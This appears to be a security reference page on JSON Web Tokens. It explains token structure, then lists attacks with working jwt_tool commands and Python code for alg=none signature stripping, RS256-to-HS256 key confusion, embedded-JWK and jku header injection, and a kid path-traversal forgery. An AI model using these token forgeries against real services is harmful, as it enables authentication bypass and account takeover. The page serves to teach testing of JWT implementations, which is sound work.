Link to this headingJSON Web Tokens (JWT) for Authentication

Learning about JWT
A toolkit for testing, tweaking and cracking JSON Web Tokens

JSON Web Token (JWT) is a compact URL-safe means of representing claims to be transferred between two parties. The claims in a JWT are encoded as a JSON object that is digitally signed using JSON Web Signature (JWS).

Auth Flow:

  1. Make request to Identity Provider and return JWT.
  2. Use JWT for authentication to Service Provider.
  • If Algorithm is Symmetric Key is shared with both the Identity Provider and the Service Provider.
  • If Algorithm is Private Key is only needed by the Identity Provider.

Link to this headingJWT Example

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9 // header .eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ // payload .SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c // signature

Decoded JWT:

//Header { "alg": "HS256", "kid": "fecf-abd3-44af33ea-2eac", "typ": "JWT" } //Payload { "sub": "1234567890", "name": "John Doe", "iat": 1516239022 } //Verify Signature HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), password )

Link to this headingHeaders

The first part of a JWT is an encoded string representation of a simple JavaScript object which describes the token along with the hashing algorithm used.

Link to this headingAlgorithms

  • None
  • HS256: HMAC using SHA-256
  • HS384: HMAC using SHA-384
  • HS512: HMAC using SHA-512
  • RS256: RSASSA-PKCS1-v1_5 using SHA-256
  • RS384: RSASSA-PKCS1-v1_5 using SHA-384
  • RS512: RSASSA-PKCS1-v1_5 using SHA-512
  • ES256: ECDSA using P-256 and SHA-256
  • ES384: ECDSA using P-384 and SHA-384
  • ES512: ECDSA using P-521 and SHA-512
  • PS256: RSASSA-PSS using SHA-256 and MGF1 with SHA-256
  • PS384: RSASSA-PSS using SHA-384 and MGF1 with SHA-384
  • PS512: RSASSA-PSS using SHA-512 and MGF1 with SHA-512

Link to this headingKeyID (kid)

Which Key is used for authentication.

Link to this headingPayload

The second part of the JWT forms the core of the token. Payload length is proportional to the amount of data you store in the JWT. General rule of thumb is: store the bare minimum in the JWT.

  • iat: issued at time – epoch time when this JWT was issued
  • exp: expiration time – epoch time when this JWT becomes invalid
  • nbf: not before time – epoch time when this JWT becomes valid
  • iss: issuer – who issued this JWT
  • sub: subject – the claims in the JWT concern this party
  • aud: audience – intended recipient
  • jti: JWT ID – a unique identifier for JWTs

Link to this headingSignature

The third, and final, part of the JWT is a signature generated based on the header (part one) and the body (part two) and will be used to verify that the JWT is valid.

Link to this headingSecurity

JWT Vulns

Invalidating sessions can only be done if the payload contains a session cookie that is verified in the database for validity.

Most JWT tokens are signed using a password and not a key. If the password is not secure enough it may be possible to break it by brute-forcing it.

Attacks:

  • Information Disclosure
  • Signature Exclusion
  • Key Confusion
  • JSON Web Key (JWK) Attack
  • Brute Force Private Key
  • Key ID Attacks
  • Timing Attacks

Link to this headingInformation Disclosure

Payload is in clear-text make sure it does not contain any sensitive data. (ie. Passwords)

Link to this headingSignature Exclusion

Remove the signature

Change alg=none and remove the signature

Example:

#alg=none >>> python ./jwt_tool.py -b eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po -X a eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJsb2dpbiI6InRpY2FycGkifQ. eyJ0eXAiOiJKV1QiLCJhbGciOiJOb25lIn0.eyJsb2dpbiI6InRpY2FycGkifQ. eyJ0eXAiOiJKV1QiLCJhbGciOiJOT05FIn0.eyJsb2dpbiI6InRpY2FycGkifQ. eyJ0eXAiOiJKV1QiLCJhbGciOiJuT25FIn0.eyJsb2dpbiI6InRpY2FycGkifQ. #Remove Signature >>> python ./jwt_tool.py -b eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po -X n eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.

Link to this headingKey Confusion

The verification key that is used in with a Private/Public Key Algorithm uses a public key.
The verification key that is used in with a Symmetric Key Algorithm uses a private key.

When taking a JWT from a Using a Private/Public Key Algorithm and changing the header to a Symmetric Key Algorithm.
The verifier will use the public key for validating the signature of the algorithm.
If the Public key is know than it is possible to change the data within the JWT.

Example:

#Signature with a null String >>> python ./jwt_tool.py -b eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po -X b eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.6iW3XbKRol_fh1x2Zu5FyfExk8EChz1gMkhuoWmL8OI #Brute Force Key

Example Code:

import jwt import requests from jwcrypto import jwk from cryptography.x509 import load_pem_x509_certificate from cryptography.hazmat.backends import default_backend # configuration jwks_url = "https://localhost/oauth2/.well-known/jwks.json" operation_url = "https://localhost/web/v1/user/andy" audience = "https://localhost" token = "eyJh..." # retrieves key from jwks def retrieve_jwks(url): r = requests.get(url) if r.status_code == 200: for key in r.json()['keys']: if key['kty'] == "RSA": return jwk.JWK(**key) print("no usable RSA key found") else: print("could not retrieve JWKS: HTTP status code " + str(r.status_code)) def extract_payload(token, public_key, audience): return jwt.decode(token, public_key, audience=audience, algorithms='RS256') def retrieve_url(url, token): header = {'Authorization' : "Bearer " + token} return requests.get(url, headers=header) # call the original operation and output it's results original = retrieve_url(operation_url, token) print("original: status: " + str(original.status_code) + "\nContent: " + str(original.json())) # get key and extract the original payload (verify it during decoding to make # sure that we have the right key, also verify the audience claim) public_key = retrieve_jwks(jwks_url).export_to_pem() payload = extract_payload(token, public_key, audience) print("(verified) payload: " + str(payload)) # create a new token based upon HS256, cause the jwt library checks this # to prevent against confusion attacks.. that we actually try to do (: mac_key = str(public_key).replace("PUBLIC", "PRIVATE") hs256_token = jwt.encode(payload, key=mac_key, algorithm="HS256") # call the operation with the new token modified = retrieve_url(operation_url, str(hs256_token)) print("modified: status: " + str(modified.status_code) + "\nContent: " + str(modified.json()))

Link to this headingJSON Web Key (JWK) Attack

In the header you can specify the key that is being used Exploit PoC

Example Config File:

{"alg":"RS256","jwk": {"kty":"RSA", "kid":"[email protected]", "use":"sig", "n":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAKAG8JNdeEQnMvq8FZy4afc8p6Kew4K2zqypQ_i3F27nOOtIqJUBFuzvrGe6-wvBcyEES6t5WIZXxwffu1DScwym79NRmdSWqvhMz6rn2bx4ca8L3QIlwcKZf5-8k750afBpb8WeJGTn62_8gcsSmCXmLxgij_i1aCpl_FLzPe9H", "e":"AAAAAAAAAAAAAQAB"}} {"user":"admin"}

Example Exploit:

#Inline Exploit #Embedded Key in Header >>> python ./jwt_tool.py -b eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po -X i eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImp3ayI6eyJrdHkiOiJSU0EiLCJraWQiOiJqd3RfdG9vbCIsInVzZSI6InNpZyIsImUiOiJBUUFCIiwibiI6IjNvTEFzTUpwQmlhRHRzbFljX0NLaWhZbE4wblZ2eFlMMHJVMzhPcVpNRGUxdUw5RzhiQnhFV0RSWnVHN2VveGJRaTY2N1U5cXFkekJnamhRTENMSHJUakQyc0p3eUZCdWVBS0Zfdm1LYnUwb2pTdnE5QXBxVXptdEZmaGZLSkg0UzRKcHNfNkFnVkNYSHh1ZzhjLW1uSEJ3dVhJc2tKV2MySmU2SVBQR29qbVBEMmQweXRGaXVQVHFhaDY1SEFDMl83azA3d0ZpRlpmcmk5Z2V5ZlBsQ0hWQWRoWm9hbTFQbGl3UU5pQnVtOVdoYkZDNWMya0FqUkVQQm1XYlVHNS1mTjQ1YUJXd1ExVnpHb0ZvWk5LeENjanVWamlaZ01SeTliU2d2dGtVTktVMXFncHRZRm9hQU5DMjNtc1RWNTJ4TGpjXzZMRDhrQTJHakhSQndzbEFSUSJ9fQ.eyJsb2dpbiI6InRpY2FycGkifQ.smr7aMCXGJLrB_6TdpV6-KL-9uOOA1eme95tq1ZD6cjdkSDGSMdeDi11Xu9JbaryuSMtoRvphH3eL-1O2GHmJ3LjIFYnjg__Dg_H_LMqnJJ4ghnnTnAiaLL-McticN8NEV5KDskgo-1ou9nvJ8ojVch9j-ucBs1KBMUu53SHMwIen2g1U1x0Mvos4tkBmCyA3JOInNPWYpg1Nd4XfNbGeE_-_fyOJ8TAv9caYrFaZapea497y1dGQH-QhWX4WFhwPt7qvXJu1GpTzEq_-_ce1QfsLJnpJMsEUWFdwPudO2NW1N3y33P0BdVTmN0qQMTeUY1bZnYIwASPhrmqAARDMg #From URL >>> python ./jwt_tool.py -b eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJsb2dpbiI6InRpY2FycGkifQ.bsSwqj2c2uI9n7-ajmi3ixVGhPUiY7jO9SUn9dm15Po -X s -ju http://example.com eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9leGFtcGxlLmNvbSJ9.eyJsb2dpbiI6InRpY2FycGkifQ.i61EdBIFIsxE1h7TiKnvZ-frJXkGyq2NPya1bWKFh4CsOYz52AgXeQ_0Xr5hxD9ZExa7vBxOqPZfZz_Z1VM00i85pupOkBwpDSvXsa2sk5crrTALFJvRgCjuyuTo39mLi-xefPia0Yf_QfFukU2bUR9P64KnastVseHammhi-evBaJP-WwljIyB2sFtH21oY6BFHz0v6OuQzrQG1Rs7CStJiOD6cckt3PL68xIP_djZgG75SZ3QX33xDgRGLd-MQ5PHVV_rRar-r_V0zyJTsEEUOhtHdcoLpgKrmGCt2a5tBHeAWtRdlNxyMbNKnCBxtnhnfnWWGw0aIJpmvucgiXg

Link to this headingKey ID Attacks

Setting the key to a known file may allow the user to be able to predict the key.

Path Example:

import jwt secret = '' encoded = jwt.encode({"user":"admin"}, secret, algorithm="HS256", headers={"kid":"../../../../../../../../../../../dev/null"}) print encoded

Link to this headingInvalidate Session

Must have a sessionID in payload and have a way to revoke the session.

Link to this headingDecode vs Verify

jwt.decode() will decrypt the payload. This will not verify the signature
jwt.verify() will check the signature with the message

Link to this headingCOSE